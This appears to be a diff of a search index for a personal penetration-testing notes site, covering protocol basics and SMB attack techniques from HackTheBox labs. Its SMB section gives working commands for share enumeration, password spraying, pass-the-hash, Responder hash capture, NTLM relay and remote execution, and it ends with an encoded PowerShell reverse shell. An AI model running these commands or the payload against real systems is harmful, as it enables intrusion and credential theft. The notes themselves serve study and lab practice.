                        • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                        • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                        • Test File Permission - OWASP Web Security Testing Guide
                        • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                        • Test Cloud Storage - OWASP Web Security Testing Guide
                        • Testing for Content Security Policy - OWASP Web Security Testing Guide
                        • Test Path Confusion - OWASP Web Security Testing Guide
                        • Testing for Weak Transport Layer Security - OWASP Web Security Testing Guide
                        • Testing for Padding Oracle - OWASP Web Security Testing Guide
                        • Testing for Sensitive Information Sent via Unencrypted Channels - OWASP Web Security Testing Guide
                        • Testing for Weak Encryption - OWASP Web Security Testing Guide
                        • Testing for Improper Error Handling - OWASP Web Security Testing Guide
                        • Testing for Stack Traces - OWASP Web Security Testing Guide
                        • Test Role Definitions - OWASP Web Security Testing Guide
                        • Test User Registration Process - OWASP Web Security Testing Guide
                        • Test Account Provisioning Process - OWASP Web Security Testing Guide
                        • Testing for Account Enumeration and Guessable User Account - OWASP Web Security Testing Guide
                        • Testing for Weak or Unenforced Username Policy - OWASP Web Security Testing Guide
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        • Testing for Reflected Cross Site Scripting - OWASP Web Security Testing Guide
                        • Testing for Stored Cross Site Scripting - OWASP Web Security Testing Guide
                        • Testing for HTTP Verb Tampering - OWASP Web Security Testing Guide
                        • Testing for HTTP Parameter Pollution - OWASP Web Security Testing Guide
                        • Testing for SQL Injection - OWASP Web Security Testing Guide
                        • Testing for LDAP Injection - OWASP Web Security Testing Guide
                        • Testing for XML Injection - OWASP Web Security Testing Guide
                        • Testing for SSI Injection - OWASP Web Security Testing Guide
                        • Testing for XPath Injection - OWASP Web Security Testing Guide
                        • Testing for IMAP SMTP Injection - OWASP Web Security Testing Guide
                        • Testing for Code Injection - OWASP Web Security Testing Guide
                        • Testing for Command Injection - OWASP Web Security Testing Guide
                        • Testing for Format String Injection - OWASP Web Security Testing Guide
                        • Testing for Incubated Vulnerability - OWASP Web Security Testing Guide
                        • Testing for HTTP Splitting Smuggling - OWASP Web Security Testing Guide
                        • Testing for HTTP Incoming Requests - OWASP Web Security Testing Guide
                        • Testing for Host Header Injection - OWASP Web Security Testing Guide
                        • Testing for Server-side Template Injection - OWASP Web Security Testing Guide
                        • Testing for Server-Side Request Forgery - OWASP Web Security Testing Guide
                        • Testing for Mass Assignment - OWASP Web Security Testing Guide
                        • Testing for Session Management Schema - OWASP Web Security Testing Guide
                        • Testing for Cookies Attributes - OWASP Web Security Testing Guide
                        • Testing for Session Fixation - OWASP Web Security Testing Guide
                        • Testing for Exposed Session Variables - OWASP Web Security Testing Guide
                        • Testing for Cross Site Request Forgery - OWASP Web Security Testing Guide
                        • Testing for Logout Functionality - OWASP Web Security Testing Guide
                        • Testing Session Timeout - OWASP Web Security Testing Guide
                        • Testing for Session Puzzling - OWASP Web Security Testing Guide
                        • Testing for Session Hijacking - OWASP Web Security Testing Guide
                        • Testing JSON Web Tokens - OWASP Web Security Testing Guide
                        • Broken access control
                        • Buffer Overflow attack
                        • Captcha Replay attack
                        • Carriage Return and Linefeed - CRLF Attack
                        • XFS attack - Cross-frame Scripting
                        • XSS attack - Cross-Site Scripting
                        • Directory Traversal attack
                        • LFI attack - Local File Inclusion
                        • Creating malware and custom payloads
                        • PHP Type Juggling Vulnerabilities
                        • RFD attack - Reflected File Download
                        • RCE attack - Remote Code Execution
                        • RFI attack - Remote File Inclusion
                        • SSRF attack - Server Side Request Forgery
                        • Server-side Template Injection - SSTI
                        • Session Puzzling - Session Variable Overloading
                        • SQL injection
                        ","tags":["tags"]},{"location":"tags/#web-server","title":"web server","text":"
                        • httprint - A web server fingerprinting tool
                        ","tags":["tags"]},{"location":"tags/#web-shells","title":"web shells","text":"
                        • Laudanum - Injectable Web Exploit Code
                        ","tags":["tags"]},{"location":"tags/#webpentesting","title":"webpentesting","text":"
                        • Pentesting oDAta
                        • Phpggc - A tool for PHP deserialization
                        • Ysoserial - A tool for Java deserialization
                        ","tags":["tags"]},{"location":"tags/#webservices","title":"webservices","text":"
                        • Pentesting web services
                        ","tags":["tags"]},{"location":"tags/#webshell","title":"webshell","text":"
                        • Web Shells
                        • WhiteWinterWolf php webshell
                        ","tags":["tags"]},{"location":"tags/#windows","title":"windows","text":"
                        • Port 389 - 636 LDAP
                        • Active Directory - LDAP
                        • The ActiveDirectory PowerShell module
                        • Arp poisoning
                        • arpspoof from dniff
                        • BloodHound
                        • CFF explorer
                        • CrackMapExec
                        • CFF explorer
                        • enum
                        • enum4linux
                        • Markup - A HackTheBox machine
                        • Tactics - A HackTheBox machine
                        • hydra
                        • SMBExec - a module from Impacket
                        • Impacket - A python tool for network protocols
                        • Index for Windows Privilege Escalation
                        • Invoke-TheHash
                        • medusa
                        • mimikatz
                        • mitm_relay Suite
                        • Microsoft Management Console (MMC)
                        • NetBIOS - Network Basic Input Output System
                        • NT Authority System
                        • Pass The Hash
                        • PowerUp.ps1
                        • pyftpdlib - A ftp server written in python
                        • pypykatz
                        • rdesktop
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • SharpView
                        • SirepRAT - RCE as SYSTEM on Windows IoT Core
                        • SysInternals Suite
                        • Transferring files techniques - Windows
                        • Virtualbox and Extension Pack
                        • WebDav- WsgiDAV - A generic and extendable WebDAV server
                        • Window Detective - A tool to view windows properties in the system
                        • Windows binaries - LOLBAS
                        • Windows credentials storage
                        • Recently accessed files and executed commands
                        • winPEAS - Windows Privilege Escalation Awesome Scripts
                        • winspy - A tool to view windows properties in the system
                        • xfreerdp
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#windows-pentesting","title":"windows pentesting","text":"
                        • JAWS - Just Another Windows (Enum) Script
                        • Seatbelt - A tool to scan Windows system
                        ","tags":["tags"]},{"location":"tags/#windows-privilege-escalation","title":"windows privilege escalation","text":"
                        • Privilege escalation - Weak service file permission
                        ","tags":["tags"]},{"location":"tags/#windows-remote-management","title":"windows remote management","text":"
                        • evil-winrm
                        ","tags":["tags"]},{"location":"tags/#winrm","title":"winrm","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        ","tags":["tags"]},{"location":"tags/#wireshark","title":"wireshark","text":"
                        • Information gathering phase - Thick client Applications
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#wordpress","title":"wordpress","text":"
                        • Pentesting Keycloak
                        • pentesting wordpress
                        • wpscan - Wordpress Security Scanner
                        ","tags":["tags"]},{"location":"tags/#xor-encryption","title":"xor encryption","text":"
                        • Bypassing IPS with handmade XOR Encryption
                        ","tags":["tags"]},{"location":"tags/#xss","title":"xss","text":"
                        • BurpSuite Labs - Cross-site Scripting
                        • XSS attack - Cross-Site Scripting
                        ","tags":["tags"]},{"location":"tags/#xxe","title":"xxe","text":"
                        • Markup - A HackTheBox machine
                        • XXE - XEE XML External Entity attack
                        ","tags":["tags"]}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Welcome to Hacking Life!","text":"

                        HackingLife is born from the urge to document the knowledge acquired in the cybersecurity field and the need of being able to retrieve it.

                        But there is something else: I strongly believe there is not much difference between fixing a broken faucet (or opening a lock, or studying the engine of your car, or walking in the countryside, or\u2026) and assessing an environment and describing its vulnerabilities. As a matter of fact, I spend my time doing all these things: fixing, repairing, and creating narratives (yes, writing too) in which magically all parts work together harmonically (or provoke the end of the world harmonically too). Tadam!

                        ","tags":["pentesting","cybersecurity"]},{"location":"#second-brain","title":"Second brain","text":"

                        It's quite intriguing how brains work because it doesn't matter how much information and resources you have available on the Internet, still, this is something you need to do for and by yourself if you want to understand in a deep sense what you are doing, keep track of it and so on.

                        So to be more than clear again: the main reason for this repository to exist is purely selfish. It's me being able to retrieve my notes and build upon them a second brain. Therefore, there is no intention of being exhaustive or giving thoughful explanations about how things work on a deep level.

                        ","tags":["pentesting","cybersecurity"]},{"location":"#acknowledgments","title":"Acknowledgments","text":"

                        Nevertheless (and to be fair) this idea is deeply inspired by Lyz-code and their Blue book. Thanks to this inspiring, polished, and... overwhelming repository I've found a way to start making sense of all my notes. Kudos!

                        Finally, I would like to highlight that this content may not be entirely original, as I've included some paragraphs directly from different sources. Most of the time, I've included a section at the top of the page to quote sources.

                        ","tags":["pentesting","cybersecurity"]},{"location":"0-255-ICMP-internet-control-message-protocol/","title":"0-255 icmp","text":"

                        Internet Control Message Protocol (ICMP) is a protocol used by devices to communicate with each other on the Internet for various purposes, including error reporting and status information. It sends requests and messages between device:

                        ICMP Requests: A request is a message sent by one device to another to request information or perform a specific action.

                        • Echo Request: This message tests whether a device is reachable on the network. When a device sends an echo request, it expects to receive an echo reply message. For example, the tools tracert (Windows) or traceroute (Linux) always send ICMP echo requests.
                        • Timestamp Request: This message determines the time on a remote device.
                        • Address Mask Request: This message is used to request the subnet mask of a device.

                        ICMP Messages: A message in ICMP can be either a request or a reply. In addition to ping requests and responses, ICMP supports other types of messages, such as error messages, destination unreachable, and time exceeded messages.

                        • Echo reply: This message is sent in response to an echo request message.
                        • Destination unreachable: This message is sent when a device cannot deliver a packet to its destination.
                        • Redirect: A router sends this message to inform a device that it should send its packets to a different router.
                        • time exceeded: This message is sent when a packet has taken too long to reach its destination.
                        • Parameter problem: This message is sent when there is a problem with a packet's header.
                        • Source quench: This message is sent when a device receives packets too quickly and cannot keep up. It is used to slow down the flow of packets.
                        "},{"location":"1090-java-rmi/","title":"1090 Pentesting Java RMI","text":"

                        The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

                        A Java RMI registry is a simplified name service that allows clients to get a reference (a stub) to a remote object.

                        When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.

                        ","tags":["java rmi","port 1090"]},{"location":"1090-java-rmi/#enumeration","title":"Enumeration","text":"
                        # Dump information from the RMI registry.\nnmap --script rmi-dumpregistry -p 1099 <target>\n

                        In this example, the name bound to the RMI server is\u00a0CustomRMIServer. It implements the\u00a0java.rmi.Remote\u00a0interface, as you would have expected. That is how one can invoke methods on the server remotely.

                        remote-method-guesser is a Java RMI vulnerability scanner that is capable of identifying common RMI vulnerabilities automatically. Whenever you identify an RMI endpoint, you should give it a try:

                        rmg enum $ip 9010\n
                        ","tags":["java rmi","port 1090"]},{"location":"110-143-993-995-imap-pop3/","title":"Ports 110, 143, 993, 995 IMAP POP3","text":"

                        With the help of the Internet Message Access Protocol (IMAP), access to emails from a mail server is possible. Unlike the Post Office Protocol (POP3).

                        IMAP allows online management of emails directly on the server and supports folder structures. Therefore, protocols such as IMAP must be used for additional functionalities such as hierarchical mailboxes directly at the mail server, access to multiple mailboxes during a session, and preselection of emails. IMAP is text-based and has extended functions, such as browsing emails directly on the server. It is also possible for several users to access the email server simultaneously. IMAP works unencrypted and transmits commands, emails, or usernames and passwords in plain text. Depending on the method and implementation used, the encrypted connection uses the standard port 143 or an alternative port such as 993.

                        POP3 only provides listing, retrieving, and deleting emails as functions at the email server. Depending on the method and implementation used, the encrypted connection uses the standard port 110 or an alternative port such as 995.

                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#footprinting-imap-pop3","title":"Footprinting IMAP / POP3","text":"
                        sudo nmap $ip -sV -p110,143,993,995 -sC\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#connect-to-an-imap-pop3-server","title":"Connect to an IMAP /POP3 server","text":"
                        curl -k 'imaps://$ip' --user user:p4ssw0rd -v\n

                        To interact with the IMAP or POP3 server over SSL, we can use openssl, as well as ncat. The commands for this would look like this:

                        openssl s_client -connect $ip:pop3s\n
                        openssl s_client -connect $ip:imaps\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-imap-commands","title":"Basic IMAP commands","text":"
                        # User's login\na LOGIN username password\n\n# Lists all directories\na LIST \"\" *\n\n# Creates a mailbox with a specified name\na CREATE \"INBOX\" \n\n# Deletes a mailbox\na DELETE \"INBOX\" \n\n# Renames a mailbox\na RENAME \"ToRead\" \"Important\"\n\n# Returns a subset of names from the set of names that the User has declared as being active or subscribed\na LSUB \"\" *\n\n# Selects a mailbox so that messages in the mailbox can be accessed\na SELECT INBOX\n\n# Exits the selected mailbox\na UNSELECT INBOX\n\n# Retrieves data (parts of the message) associated with a message in the mailbox\na FETCH <ID> all\n# If you want to retrieve the body:\na FETCH <ID> BODY.PEEK[TEXT]\n\n# Removes all messages with the `Deleted` flag set\na CLOSE\n\n# Closes the connection with the IMAP server\na LOGOUT\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-pop3-commands","title":"Basic POP3 commands","text":"
                        # Identifies the user\nUSER username\n\n# Authentication of the user using its password\nPASS password\n\n# Requests the number of saved emails from the server\nSTAT\n\n# Requests from the server the number and size of all emails\nLIST \n\n# Requests the server to deliver the requested email by ID\nRETR id\n\n# Requests the server to delete the requested email by ID\nDELE id\n\n# Requests the server to display the server capabilities\nCAPA\n\n# Requests the server to reset the transmitted information\nRSET\n\n# Closes the connection with the POP3 server\nQUIT\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#installing-a-mail-server-evolution","title":"Installing a mail server: Evolution","text":"
                        sudo apt-get install evolution\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"111-32731-rpc/","title":"Port 111, 32731 - rpc","text":"

                        Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service. See rpcclient.

                        Default port: 111/TCP/UDP, 32771 in Oracle Solaris.

                        RPCBind + NFS

                        ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"135-windows-management-instrumentation-wmi/","title":"135 wmi","text":"

                        Windows Management Instrumentation (WMI) is Microsoft's implementation and also an extension of the Common Information Model (CIM), core functionality of the standardized Web-Based Enterprise Management (WBEM) for the Windows platform. WMI allows read and write access to almost all settings on Windows systems. Understandably, this makes it the most critical interface in the Windows environment for the administration and remote maintenance of Windows computers, regardless of whether they are PCs or servers. WMI is typically accessed via PowerShell, VBScript, or the Windows Management Instrumentation Console (WMIC). WMI is not a single program but consists of several programs and various databases, also known as repositories.

                        "},{"location":"135-windows-management-instrumentation-wmi/#footprinting-the-service","title":"Footprinting the service","text":"

                        The initialization of the WMI communication always takes place on TCP port 135, and after the successful establishment of the connection, the communication is moved to a random port. For example, the program wmiexec.py from the Impacket toolkit can be used for this.

                        /usr/share/doc/python3-impacket/examples/wmiexec.py <username>:<\"password\">@$ip <hostname>\n
                        "},{"location":"135-windows-management-instrumentation-wmi/#source","title":"Source","text":"

                        HackTheBox Academy

                        "},{"location":"137-138-139-445-smb/","title":"Ports 137, 138, 139, 445 SMB","text":"

                        Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. It runs mainly on Windows, BUT with the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB.

                        Basically a SMB server provides arbitrary parts of its local file system as shares. Therefore the hierarchy visible to a client is partially independent of the structure on the server.

                        Samba is an alternative variant to the SMB server, developed for Unix-based operating system. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a \"dialect\" of SMB. In other words, CIFS is a very specific implementation of the SMB protocol, which in turn was created by Microsoft. This allows Samba to communicate with newer Windows systems. Therefore, it usually is referred to as SMB / CIFS. However, CIFS is the extension of the SMB protocol. So when we pass SMB commands over Samba to an older NetBIOS service, it usually connects to the Samba server over TCP ports 137, 138, 139, but CIFS uses TCP port 445 only. There are several versions of SMB, including outdated versions that are still used in specific infrastructures. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.

                        SMB Version Supported Features CIFS Windows NT 4.0 Communication via NetBIOS interface SMB 1.0 Windows 2000 Direct connection via TCP SMB 2.0 Windows Vista, Windows Server 2008 Performance upgrades, improved message signing, caching feature SMB 2.1 Windows 7, Windows Server 2008 R2 Locking mechanisms SMB 3.0 Windows 8, Windows Server 2012 Multichannel connections, end-to-end encryption, remote storage access SMB 3.0.2 Windows 8.1, Windows Server 2012 R2 SMB 3.1.1 Windows 10, Windows Server 2016 Integrity checking, AES-128 encryption
                        • On Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP
                        • but if Windows has NetBIOS enabled, or we are targetting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.

                        In a network, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an application programming interface (API) for networking computers called the Network Basic Input/Output System (NetBIOS). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called name registration procedure. Either each host reserves its hostname on the network, or the NetBIOS Name Server (NBNS) is used for this purpose. It also has been enhanced to Windows Internet Name Service (WINS).

                        Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication,

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#footprinting-smb","title":"Footprinting smb","text":"

                        nmap

                        sudo nmap $ip -sV -sC -p139,445\n\n# Script for nteracting with the SMB service to extract the reported operating system version.\nnmap --script smb-os-discovery.nse -p445 $ip\n\n# Service scanning\nnmap -A -p445 $ip\n

                        smbmap

                        # Enumerate network shares and access associated permissions.\nsmbmap -H $ip \n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#typical-attacks","title":"Typical attacks","text":"

                        For some of these attacks we will use smbclient. See installation, connection and syntax in smbclient

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#1-null-attack","title":"1. Null attack","text":"
                        # Connect to smb [-L|--list=HOST] : Selecting the targeted host for the connection request.\nsmbclient -L -N //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

                        Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask you for a password for your local username. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username.

                        Without parameter -N, password will be prompted. We leave the password field blank, simply hitting Enter to tell the script to move along.

                        After authenticating, we may obtain access to some typical shared folders, such as:

                        ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

                        We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:

                        # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#2-smb2-security-levels","title":"2. smb2 security levels","text":"

                        To detect it, run:

                        nmap --script smb2-security-mode -p 445 $ip\n# Add -Pn to avoid firewall if needed\n

                        Output:

                         smb2-security-mode:\n\n|   2.02:\n\n|_    Message signing enabled but not required\n

                        There are three potential results for the message signing:

                        1. Message signing disabled.

                        2. Message signing enabled but not required (default for SMB2).

                        3. Message signing enabled and required.

                        Options 1 and 2 are vulnerable to SMB relay attacks. Option 3 is the most secure option.

                        In case 1, attack is similar to the first vuln. In the second case, we can bypass login, leaving in blank the password, but including the user in the request:

                        smbclient -L \\\\$ip -U Administrator\n# -L: retrieve a list of available shares on the remote host\n# -U: user \n\nsmbclient -N -L \\\\$ip\n# -N: Suppresses the password prompt.\n

                        Important: Sometimes some jugling is needed:

                        smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#3-signing-enabled-but-not-required","title":"3. Signing enabled but not required","text":"

                        HackTheBox machine: Tactics

                        After running a nmap with scripts enabled (nmap -sC -A 10.129.228.98 -Pn -p-), you get this response:

                        | smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n

                        This will allow us to use smbclient share enumeration without the need of providing a password when signing into the shared folder. For that we will use a well known user in Windows: Administrator.

                        smbclient -L $ip -U Administrator\n

                        Same thing is possible with rpcclient:

                        # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#4-brute-force","title":"4. Brute force","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#user-enumeration-with-rpcclient","title":"User enumeration with rpcclient","text":"
                        # Brute forcing user enumeration with rpcclient:\nfor i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#password-spraying-with-crackmapexec","title":"Password spraying with crackmapexec","text":"
                        crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#module-smb_login-in-metasploit","title":"Module smb_login in metasploit","text":"

                        With metasploit, use the module: auxiliary/scanner/smb/smb_login

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#5-remote-code-execution-rce-with-psexec-smbexec-crackmapexec","title":"5. Remote Code Execution (RCE) with PsExec, SmbExec, crackMapExec","text":"

                        PsExec\u00a0is a tool from SysInternals Suite that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.

                        Alternatives to PsExec from SysInternals: Impacket PsExec, Impacket SMBExec, Impacket atexec\u00a0(This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command), CrackMapExec\u00a0, Metasploit PsExec\u00a0- Ruby PsExec implementation.

                        # Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-atexec  administrator:'<password>'@$ip\n

                        RCE with crackmapexec:

                        #  If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#6-pass-the-hash-pth-with-crackmapexec","title":"6. Pass the Hash (PtH) with crackmapexec","text":"
                        # Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>)\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#7-forced-authentication-attacks","title":"7. Forced Authentication Attacks","text":"

                        We can also abuse the SMB protocol by creating a fake SMB Server to capture users' NetNTLM v1/v2 hashes. The most common tool to perform such operations is the Responder. Responder is an LLMNR, NBT-NS, and MDNS poisoner tool with different capabilities, one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes.

                        ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

                        All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

                        hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#8-ntlm-relay-attack","title":"8. NTLM relay attack","text":"

                        If we capture the hash but cannot crack it, then we can try a NTLM relay attack with impacket-ntlmrelayx or Responder MultiRelay.py.

                        Step 1: Set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

                        cat /etc/responder/Responder.conf | grep 'SMB ='\n

                        Step 2: Launch proxy and get SAM database

                        # impacket-ntlmrelayx will dump the SAM database by default\nimpacket-ntlmrelayx --no-http-server -smb2support -t $ip\n# --no-http-server:\n#  -smb2support: \n# -t: ip target\n

                        Step 3: Create a PowerShell reverse shell using\u00a0https://www.revshells.com/

                        # Use option to encode it in base 64\npowershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA\n

                        Step 4: Use the captured hash to launch a reverse shell. Commands in impacket-ntlmrelayx can be executed with flag -c.

